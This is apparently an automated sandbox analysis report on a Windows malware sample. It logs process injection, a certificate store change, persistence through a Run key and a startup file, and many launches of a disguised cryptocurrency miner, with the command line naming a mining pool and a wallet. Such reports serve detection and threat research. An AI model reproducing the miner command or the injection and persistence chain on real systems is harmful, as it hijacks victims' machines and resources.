Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	fsucenter.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

C4FF50648C4FB9E60E0F0C30A41BBA2C.exe

pid	process
2388	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
2388	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3064
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

C4FF50648C4FB9E60E0F0C30A41BBA2C.exe

pid process

2388 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064

pid	process
3064

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

85C1.exe949A.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeDebugPrivilege	4036	85C1.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeDebugPrivilege	2004	949A.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

7B11.tmp

pid process

812 7B11.tmp
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3064

pid	process
812	7B11.tmp

pid	process
3064

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4FF50648C4FB9E60E0F0C30A41BBA2C.exe7B11.exe7B11.tmp7B11.exe7B11.tmp8A56.exeRuntimebroker.exe

description	pid	process	target process
PID 4020 wrote to memory of 2388	4020	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
PID 4020 wrote to memory of 2388	4020	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
PID 4020 wrote to memory of 2388	4020	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
PID 4020 wrote to memory of 2388	4020	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
PID 4020 wrote to memory of 2388	4020	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
PID 4020 wrote to memory of 2388	4020	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe	C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
PID 3064 wrote to memory of 1152	3064		7B11.exe
PID 3064 wrote to memory of 1152	3064		7B11.exe
PID 3064 wrote to memory of 1152	3064		7B11.exe
PID 1152 wrote to memory of 3784	1152	7B11.exe	7B11.tmp
PID 1152 wrote to memory of 3784	1152	7B11.exe	7B11.tmp
PID 1152 wrote to memory of 3784	1152	7B11.exe	7B11.tmp
PID 3784 wrote to memory of 2112	3784	7B11.tmp	7B11.exe
PID 3784 wrote to memory of 2112	3784	7B11.tmp	7B11.exe
PID 3784 wrote to memory of 2112	3784	7B11.tmp	7B11.exe
PID 2112 wrote to memory of 812	2112	7B11.exe	7B11.tmp
PID 2112 wrote to memory of 812	2112	7B11.exe	7B11.tmp
PID 2112 wrote to memory of 812	2112	7B11.exe	7B11.tmp
PID 3064 wrote to memory of 4036	3064		85C1.exe
PID 3064 wrote to memory of 4036	3064		85C1.exe
PID 3064 wrote to memory of 4036	3064		85C1.exe
PID 3064 wrote to memory of 3916	3064		8A56.exe
PID 3064 wrote to memory of 3916	3064		8A56.exe
PID 3064 wrote to memory of 3916	3064		8A56.exe
PID 812 wrote to memory of 832	812	7B11.tmp	fsucenter.exe
PID 812 wrote to memory of 832	812	7B11.tmp	fsucenter.exe
PID 812 wrote to memory of 832	812	7B11.tmp	fsucenter.exe
PID 3064 wrote to memory of 2684	3064		8D54.exe
PID 3064 wrote to memory of 2684	3064		8D54.exe
PID 3064 wrote to memory of 2684	3064		8D54.exe
PID 3064 wrote to memory of 1192	3064		90B1.exe
PID 3064 wrote to memory of 1192	3064		90B1.exe
PID 3064 wrote to memory of 1192	3064		90B1.exe
PID 3916 wrote to memory of 3256	3916	8A56.exe	Runtimebroker.exe
PID 3916 wrote to memory of 3256	3916	8A56.exe	Runtimebroker.exe
PID 3916 wrote to memory of 3256	3916	8A56.exe	Runtimebroker.exe
PID 3064 wrote to memory of 2004	3064		949A.exe
PID 3064 wrote to memory of 2004	3064		949A.exe
PID 3064 wrote to memory of 2004	3064		949A.exe
PID 3064 wrote to memory of 2248	3064		explorer.exe
PID 3064 wrote to memory of 2248	3064		explorer.exe
PID 3064 wrote to memory of 2248	3064		explorer.exe
PID 3064 wrote to memory of 2248	3064		explorer.exe
PID 3064 wrote to memory of 3748	3064		explorer.exe
PID 3064 wrote to memory of 3748	3064		explorer.exe
PID 3064 wrote to memory of 3748	3064		explorer.exe
PID 3256 wrote to memory of 2028	3256	Runtimebroker.exe	powershell.exe
PID 3256 wrote to memory of 2028	3256	Runtimebroker.exe	powershell.exe
PID 3256 wrote to memory of 2028	3256	Runtimebroker.exe	powershell.exe
PID 3064 wrote to memory of 3996	3064		explorer.exe
PID 3064 wrote to memory of 3996	3064		explorer.exe
PID 3064 wrote to memory of 3996	3064		explorer.exe
PID 3064 wrote to memory of 3996	3064		explorer.exe
PID 3064 wrote to memory of 1596	3064		explorer.exe
PID 3064 wrote to memory of 1596	3064		explorer.exe
PID 3064 wrote to memory of 1596	3064		explorer.exe
PID 3064 wrote to memory of 1672	3064		explorer.exe
PID 3064 wrote to memory of 1672	3064		explorer.exe
PID 3064 wrote to memory of 1672	3064		explorer.exe
PID 3064 wrote to memory of 1672	3064		explorer.exe
PID 3064 wrote to memory of 3848	3064		explorer.exe
PID 3064 wrote to memory of 3848	3064		explorer.exe
PID 3064 wrote to memory of 3848	3064		explorer.exe
PID 3064 wrote to memory of 3704	3064		explorer.exe

C:\Users\Admin\AppData\Local\Temp\C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
"C:\Users\Admin\AppData\Local\Temp\C4FF50648C4FB9E60E0F0C30A41BBA2C.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4020

C:\Users\Admin\AppData\Local\Temp\C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
"C:\Users\Admin\AppData\Local\Temp\C4FF50648C4FB9E60E0F0C30A41BBA2C.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2388

C:\Users\Admin\AppData\Local\Temp\7B11.exe
C:\Users\Admin\AppData\Local\Temp\7B11.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1152

C:\Users\Admin\AppData\Local\Temp\is-O66OP.tmp\7B11.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O66OP.tmp\7B11.tmp" /SL5="$40178,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7B11.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3784

C:\Users\Admin\AppData\Local\Temp\7B11.exe
"C:\Users\Admin\AppData\Local\Temp\7B11.exe" /VERYSILENT
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2112

C:\Users\Admin\AppData\Local\Temp\is-FP1NT.tmp\7B11.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FP1NT.tmp\7B11.tmp" /SL5="$50178,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7B11.exe" /VERYSILENT
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:812

C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:832

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4448

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4492

C:\ProgramData\Data\install.exe
"C:\ProgramData\Data\install.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4532

C:\ProgramData\Data\install.exe
"C:\ProgramData\Data\install.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:4804

C:\Program Files\7-Zip\Lang\sihost.exe
"C:\Program Files\7-Zip\Lang\sihost.exe"
8⤵
- Executes dropped EXE
PID:4052

C:\ProgramData\Systemd\HostData.exe
NULL
6⤵
- Executes dropped EXE
PID:4556

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4588

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4680

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4732

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4856

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4940

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4980

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5020

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5060

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5100

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2704

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4160

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3740

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2516

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4208

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1124

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3916

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1992

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:916

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:824

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:184

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1380

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:3516

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:3528

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:600

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:3196

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4476

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1176

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4496

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4564

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4672

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4648

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4720

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4792

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4852

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4912

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4984

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5104

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4992

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1192

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2312

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5032

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:3828

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1328

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4248

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4268

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2836

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4928

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4304

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Checks whether UAC is enabled
PID:1832

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2300

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:916

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2884

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4396

C:\Users\Admin\AppData\Local\Temp\85C1.exe
C:\Users\Admin\AppData\Local\Temp\85C1.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4036

C:\Users\Admin\AppData\Local\Temp\8A56.exe
C:\Users\Admin\AppData\Local\Temp\8A56.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3916

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
